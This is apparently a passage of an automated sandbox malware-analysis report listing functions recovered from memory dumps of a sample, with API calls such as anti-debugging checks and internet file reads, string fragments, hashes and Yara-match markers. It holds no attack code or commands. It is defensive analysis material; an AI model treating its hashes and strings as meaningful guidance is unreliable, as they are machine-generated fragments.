                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: @BAO$updateSW
                      • API String ID: 3554146954-956047173
                      • Opcode ID: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
                      • Instruction ID: cb50f06d884e9880f0ef62a95241579db65518dc8b806f430c65bdc54610dab4
                      • Opcode Fuzzy Hash: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
                      • Instruction Fuzzy Hash: 953213B0D00254DBEB28DF24CC987ADBBB4AF40314F6542F9D8096B2A6D775AE84CF45
                      Function 005E8A42 Relevance: 12.9, Strings: 9, Instructions: 1615COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: /Cg$2[]O$2[]O$2<$;)@~$Ic?}$Mko$_Dr"$f'3|
                      • API String ID: 0-1842464399
                      • Opcode ID: e925d0338d98689c8b508e89348f9094c2afe70e491aee9ebdf2f12af06bd759
                      • Instruction ID: d1e83d054da02439293658cdb3155459ee3a57bd54aeebd64df5af04d572222d
                      • Opcode Fuzzy Hash: e925d0338d98689c8b508e89348f9094c2afe70e491aee9ebdf2f12af06bd759
                      • Instruction Fuzzy Hash: 6DB2F5F350C2049FE304AE2DED8567ABBE5EF94720F16892DEAC4C3744EA3598058797
                      Function 0041A346 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                      • Instruction ID: 4ec5cfcd79f9b81e0d104b8321146cba3f0ab1dc6500a030f703b9c7425dc3b2
                      • Opcode Fuzzy Hash: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                      • Instruction Fuzzy Hash: E8D21671E092288FDB65CE28DD807EAB7B5EB44305F1441EAD80DE7240E778AEC58F85
                      Function 005EDA5C Relevance: 9.1, Strings: 6, Instructions: 1608COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: &[N1$.A~$FX?$P~Mv$rz_1$zw
                      • API String ID: 0-2478748842
                      • Opcode ID: c43e54eb0469b9b51096376daf091ac622c15f6058b4d0338b0005be8e219bfc
                      • Instruction ID: 419078c01fd8c55a386fe1ace3515ab26d7b54b243cb8d90defc19801e807051
                      • Opcode Fuzzy Hash: c43e54eb0469b9b51096376daf091ac622c15f6058b4d0338b0005be8e219bfc
                      • Instruction Fuzzy Hash: 4AB2E5F3A0C6009FE304AE2DEC81A7ABBE5EB94720F1A493DE6C5C7744E63558058697
                      Function 005E5374 Relevance: 9.1, Strings: 6, Instructions: 1605COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4"C$pm{${c;_$'{{$0jt$?~
                      • API String ID: 0-945698808
                      • Opcode ID: 64076b6cc7e2687d166f93dd237e4702b04a60768a1000f8413e463ba1c33cda
                      • Instruction ID: 4c985715788b00c74ebc65ba9d70590b62aee7d5a5c866de70c66dbbca8a20e0
                      • Opcode Fuzzy Hash: 64076b6cc7e2687d166f93dd237e4702b04a60768a1000f8413e463ba1c33cda
                      • Instruction Fuzzy Hash: 9FB207F3A0C304AFE3046E6DEC8566ABBE9EF94760F16893DE6C4C3744E63558018796
                      Function 00401970 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 293networkfileCOMMON
                      Download Yara Rule
                      APIs
                      • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401A05
                      • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401A28
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileInternet$PointerRead
                      • String ID: text
                      • API String ID: 3197321146-999008199
                      • Opcode ID: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                      • Instruction ID: 56e9ac6e571947bcf275884445d614b5348a2aaf1a2f7cc802118cd3fea156c2
                      • Opcode Fuzzy Hash: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                      • Instruction Fuzzy Hash: 10C13970A002189FDB24DF54CC85BE9B7B5EF49304F1041EAE409B72A1DB78AE95CF99
                      Function 005E6F24 Relevance: 7.9, Strings: 5, Instructions: 1614COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: &A}~$&n>'$]}?$_2D$r2}
                      • API String ID: 0-705243956
                      • Opcode ID: acd1c4dba2877de175480c78103f39f31a15e31189ed6ab7af221e04c49217c6
                      • Instruction ID: 4729e4da47fad8b733fbbe98e1e61a9f66f0360683a102618567bf6101ecdc06
                      • Opcode Fuzzy Hash: acd1c4dba2877de175480c78103f39f31a15e31189ed6ab7af221e04c49217c6
                      • Instruction Fuzzy Hash: 14B218F3A0C2109FE7046E2DEC8567ABBE9EF94320F1A853DE6C4C3744EA7558058796
                      Function 005F2A52 Relevance: 6.6, Strings: 4, Instructions: 1597COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: :Ck_$@J!$jH>,$}\=J
                      • API String ID: 0-772269620
                      • Opcode ID: 3a6b6527666235d5e2f92712d7e33cb7cdb07ebcbe488c1d4df61db4ea0e96ac
                      • Instruction ID: 2b736a71cea5c5cbce4012d0149ee288020d3c6f459114558c9e003159f6e61f
                      • Opcode Fuzzy Hash: 3a6b6527666235d5e2f92712d7e33cb7cdb07ebcbe488c1d4df61db4ea0e96ac
                      • Instruction Fuzzy Hash: B2B205F3A0C2049FE304AE29EC8567AFBE5EF94320F1A493DEAC5C3744E67558058697
                      Function 00410940 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction ID: 78ffdd1b1e8fbf681df67024148688f8aa54f57810aac3ba8850cddb3c6bfb2a
                      • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction Fuzzy Hash: 87024D71E002199BDF14CFA9D9806EEBBB1FF48314F24826AE519E7340D775A981CB94
                      Function 04960BA7 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction ID: 5870f6e88b346de3dd458830fb0bab3246a4d891899ac372411a492dd1262dbd
                      • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction Fuzzy Hash: B9022D71E012199FDF14CFA8D9D0AAEBBB5FF48314F248269D91AEB340D731A941CB90
                      Function 0040A58A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                      Download Yara Rule
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
                      • IsDebuggerPresent.KERNEL32 ref: 0040A662
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A682
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A68C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction ID: e2fd69841e347503e8527ce1becac27b78df2bbd7224e42b4cf7edbda655d181
                      • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction Fuzzy Hash: 04313A75D4131CDBDB10DFA5D989BCDBBB8BF08304F1080AAE408A7290EB759E858F49
                      Function 0495A7F1 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                      Download Yara Rule
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0495A7FD
                      • IsDebuggerPresent.KERNEL32 ref: 0495A8C9
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0495A8E9
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0495A8F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction ID: d80dbb66706cfd000b64b7993774e351344232ebf29181e0be46c47f672497d0
                      • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction Fuzzy Hash: 9931E975D0521DDBDB10DFA4D9497CCBBB8BF08304F2041AAE509A7250EB715A858F49
                      Function 005F4544 Relevance: 5.4, Strings: 3, Instructions: 1655COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: '\W$BQ~$p?>
                      • API String ID: 0-2806615756
                      • Opcode ID: 9a04ec2e8aee34fa25611c93605be2cd04c4918197c97e7c53e1ac7337ccd326
                      • Instruction ID: ce038d9a5cb158548af9180a241f90689f7f3727b097af05672f8eb4e1823d55
                      • Opcode Fuzzy Hash: 9a04ec2e8aee34fa25611c93605be2cd04c4918197c97e7c53e1ac7337ccd326
                      • Instruction Fuzzy Hash: 45B248F3A0C2049FD3046F2DEC8567ABBE5EF94620F1A493DEAC5C3744EA3558058697
                      Function 005E3DC2 Relevance: 5.0, Strings: 3, Instructions: 1224COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 2S_~$@@^$tUwY
                      • API String ID: 0-846384618
                      • Opcode ID: 527fd7aedf552d8a4aeb4e213bdf300f46b7e6da4a71060e5aa47a325255abd3
                      • Instruction ID: 5a4f6d1acf07c5187f46527a0287ac1ed5ed178bc8db2788687a921325405047
                      • Opcode Fuzzy Hash: 527fd7aedf552d8a4aeb4e213bdf300f46b7e6da4a71060e5aa47a325255abd3
                      • Instruction Fuzzy Hash: D9827AF3A0C2049FE304AE2DEC8567AB7D9EF94320F1A463DEAC4C7744E97598058697
                      Function 0040CDE3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                      • Instruction ID: c8210cab332152a7f303cacbc0cae8b9100ca1fc91568f2564f16f954c9570b7
                      • Opcode Fuzzy Hash: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                      • Instruction Fuzzy Hash: 3331D574941218EBCB21DF65D8897CDBBB4BF08314F5082EAE81CA7291E7749F858F49
                      Function 0495D04A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04952AA0), ref: 0495D142
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04952AA0), ref: 0495D14C
                      • UnhandledExceptionFilter.KERNEL32(0495277A,?,?,?,?,?,04952AA0), ref: 0495D159
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                      • Instruction ID: c2750cbfe8e65d27d420d393e087f44d5dc05252f40ce80360e105cbb7549b49
                      • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                      • Instruction Fuzzy Hash: 1C31CA749012289BCB21DF64DC897CCB7B8BF48310F6081EAE80CA7260E7709F858F44
                      Function 0495092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: .$GetProcAddress.$l
                      • API String ID: 0-2784972518
                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction ID: dda99c21e20aebc667b716420b59f138b9c13632cd9a7e34b5f863dc2035b6ef
                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction Fuzzy Hash: F1315CB6900609DFDB10CF99C880AADBBF9FF48324F24445AD941A7324D771FA45CBA4
                      Function 00410822 Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,DE4EB787), ref: 00410837
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 1518329722-0
                      • Opcode ID: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                      • Instruction ID: 1c50189d93918816d196ec70bd43d3640a511bc00310eef3747ee1678f9f3f9c
                      • Opcode Fuzzy Hash: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                      • Instruction Fuzzy Hash: 09F0F9B1E002147B8724AF6EC8049DFBEE9EEC5770725465AE809D3340D5B4CD8182D4
                      Function 00473BFC Relevance: 2.7, Strings: 2, Instructions: 208COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: NTDL$e((y
                      • API String ID: 0-2475185381
                      • Opcode ID: 36fab3ab4fbcac0ee3e99b154a74930355e0d6515167e59bf74c3b94347ac55b
                      • Instruction ID: 326dd025c1b9168bbf3025e6bb984b877a5a5db6d1164817a025fb0c29787ef6
                      • Opcode Fuzzy Hash: 36fab3ab4fbcac0ee3e99b154a74930355e0d6515167e59bf74c3b94347ac55b
                      • Instruction Fuzzy Hash: C161B2B290821E8FDB258F25C5001EF7BA1EB56322F10C12BD84A97641D77A4E21FB9D
                      Function 0041572E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00415729,?,?,00000008,?,?,0041C68A,00000000), ref: 0041595B
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction ID: 6715a78ad53a010e1f654acf6738d2326510568a7b3af97ced4f43bd22a978ec
                      • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction Fuzzy Hash: 02B17E71520A08DFD714CF28C486BE57BE0FF85364F298659E899CF2A1C339D992CB45
                      Function 04965995 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04965990,?,?,00000008,?,?,0496C8F1,00000000), ref: 04965BC2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction ID: 37b66c8a5b174f84119a405ac626fca93bf80b2d5222919d4895e9e067cff068
                      • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction Fuzzy Hash: 95B14C31610609EFD715CF28D48AB657BE5FF45364F2A8668E89ACF2A1C335E981CB40
                      Function 0040A2EC Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                      Download Yara Rule
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A302
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FeaturePresentProcessor
                      • String ID:
                      • API String ID: 2325560087-0
                      • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                      • Instruction ID: 655f466d2002f1984def2d585099db1cc9528c498776e59a8b59a497753dfce5
                      • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                      • Instruction Fuzzy Hash: 4C5136B1E10315CFDB24CF95D8857AABBF0FB48314F24803AD905EB3A1D37899568B99
                      Function 0040EF09 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                      • Instruction ID: a862614980e7782cfb360a41e62bb903fc37a91afa162c473b4857922a947482
                      • Opcode Fuzzy Hash: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                      • Instruction Fuzzy Hash: DDC1EE309006079ECB34CE69C584A7BBBB1AB45304F144A7FD856B7BD2C339AD0ACB59
                      Function 0495F170 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                      • Instruction ID: c95cf3e44fa5be73fa5546c9f640b65e0a252bf705298eeb8bd518642b659b28
                      • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                      • Instruction Fuzzy Hash: 44C1F1746006068FDB24DF68C584A7ABBBABF85324F344A39DC529B6B8D330B945CB11
                      Function 0040EBC7 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                      • Instruction ID: c83ad001e3c04e1f23fe5313526111bf351830610e2bf169758c16327f184a9c
                      • Opcode Fuzzy Hash: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                      • Instruction Fuzzy Hash: 3EB1E47090460B8BDB248E6AC555ABFB7A1AF41304F140E3FD452B77C1C73EAD268B89
                      Function 0495EE2E Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                      • Instruction ID: edf423b0465f1d23475e2251ffc5719d895b757c228e9e29fdb9d76060ca5e65
                      • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                      • Instruction Fuzzy Hash: 6CB1E570A0460A8BDF24DF68C958ABEB7A9EF44314F34063DDC52976B4DB32B605CB51
                      Function 0040A720 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                      Download Yara Rule
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                      • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction Fuzzy Hash:
                      Function 0495A987 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                      Download Yara Rule
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(0040A72C,0495A30B), ref: 0495A98C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                      • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction Fuzzy Hash:
                      Function 005A8A25 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: &q?u
                      • API String ID: 0-2308932118
                      • Opcode ID: c08b91ae9c7e01ee62735828a0f75c5b69da190f1af16add4fb8dbc12d06d603
                      • Instruction ID: a27ba71afd500805eab13b258b346cceeb804a68df43d0f45567d03869c51e30
                      • Opcode Fuzzy Hash: c08b91ae9c7e01ee62735828a0f75c5b69da190f1af16add4fb8dbc12d06d603
                      • Instruction Fuzzy Hash: 267100F3A086149FE314AF19CC4277AF7E6EF94720F1A892CDAC487744EA3558418B87
                      Function 004F7320 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4i;_
                      • API String ID: 0-3731743512
                      • Opcode ID: 3664762a9d608c19c218f0e7455b0922f4ac3b8ec9c00c4e8ed24b193deb0d0d
